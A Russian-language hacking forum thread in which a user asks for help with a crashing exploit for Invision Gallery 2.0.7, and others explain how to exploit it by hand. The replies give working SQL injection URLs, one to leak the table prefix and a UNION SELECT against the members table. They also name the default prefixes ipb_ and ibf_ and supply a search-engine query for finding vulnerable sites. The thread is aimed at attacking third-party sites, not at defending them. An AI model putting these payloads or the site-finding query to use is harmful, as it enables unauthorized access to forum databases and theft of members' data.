Форум АНТИЧАТ - Проблема с сплойтом на Invision Gallery 2.0.7

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Проблема с сплойтом на Invision Gallery 2.0.7 (https://forum.antichat.xyz/showthread.php?t=40503)

Проблема с сплойтом на Invision Gallery 2.0.7

скачал сплойт "Invision Gallery => 2.0.7 ReadFile() & SQL injection exploit" от HellKnights. Откомпилил при попытке заюзать выдает ошибку аля
"Exception 0xc0000005:
Segment violation
Adress: 0x73d5e67d"
и в cmd пишет "abnormal program termination"
В коде сплойта создателями специально допущена ошибка? Вот в общем то помогите решить проблему.
ссылка на сам сплойт

Если не можешь использовать эксплоит, учись разбирать его и делай все вручную.
Как видно из исходника, здесь присутствуют 2 уязвимости. sql-injection и readfile().
ReadFile() мы трогать не будем, тут и так все понятно.
Рассмотрим sql-injection.
Для начала узнаем префикс таблиц в бд:

Цитата:

http://host/?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20hellknightscrew

Теперь используем багу так:

Цитата:

http://host/?automodule=gallery&cmd=rate&img=1&rating=1&album=-1+union+select+1,1,1,1,1,1,1,1,1+from+prefix_members+where+id=id

вместо prefix и id подставляем соответствующие значения.
Как видишь, ничего сложного \=

Можно два глупых вопроса ? :confused: ))

вместо prefix и id подставляем соответствующие значения.

что такое Префикс ???

и как в поисковиках писать что бы найти "Invision Gallery => 2.0.7" :confused: ???

префикс по дэфолту обычно или ipb_ или ibf_

http://www.google.com/search?hl=en&q=Invision+Gallery+2.0.7+%C2%A9+2007+ +IPS%2C+Inc.&btnG=Search

клозед. вопрос исчерпан.